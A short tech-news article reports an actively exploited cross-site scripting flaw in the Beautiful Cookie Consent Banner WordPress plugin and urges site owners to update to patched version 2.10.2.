Whether you’ve got one of the best WordPress hosting plans or not, you could be a target for cyber criminals. That much is clear after the revelation that users of a popular WordPress plugin may be left vulnerable to cyber criminals if they’re not running the latest version.
According to researchers from WordPress focused security company Defiant, a flaw in Beautiful Cookie Consent Banner leaves sites with the plugin installed at risk of Cross-Site Scripting, otherwise known as XSS, attacks.
This type of threat is essentially when bad actors (as hackers and cyber criminals are often called in online security circles) infect websites with malicious JavaScript code via a vulnerability, like the one found in the plugin. They can then take any number of unauthorized actions, whether it’s stealing sensitive information, staging a malware attack, or even completely taking over the website in question.
Up to 1.5 Million Attacks Linked to Flaw
Ram Gall, a security researcher and part of the Defiant team, shared full details of the vulnerability on the Wordfence website.
The short version is that the Beautiful Cookie Consent Banner flaw allows hackers to create fake WordPress admin accounts, which then theoretically gives them access to, and control of, entire websites.
He says that up to 1.5 million websites may have been targeted by as many as 3 million separate attacks, all related to the Beautiful Cookie Consent Banner flaw. If that’s enough bad news for a weekend, don’t worry — there’s a silver lining to this particular cloud.
What Beautiful Cookie Users Should Do Right Now
Gall adds that Beautiful Cookie’s creators have already released a patch addressing the flaw. This means it’s easy to protect yourself and your website against the vulnerability mentioned above.
To make sure you’re fully buffered against XSS attacks, anyone using (or thinking of using) the plugin should make sure they are running version 2.10.2. This is the latest version and what should be automatically downloaded if you’re new to the plugin, though it’s worth checking just in case.
Webmasters with older versions of the plugin are being urged to update to the patched version as a matter of importance, even if Gall and his team don’t deem the vulnerability to be a critical one in its present form.
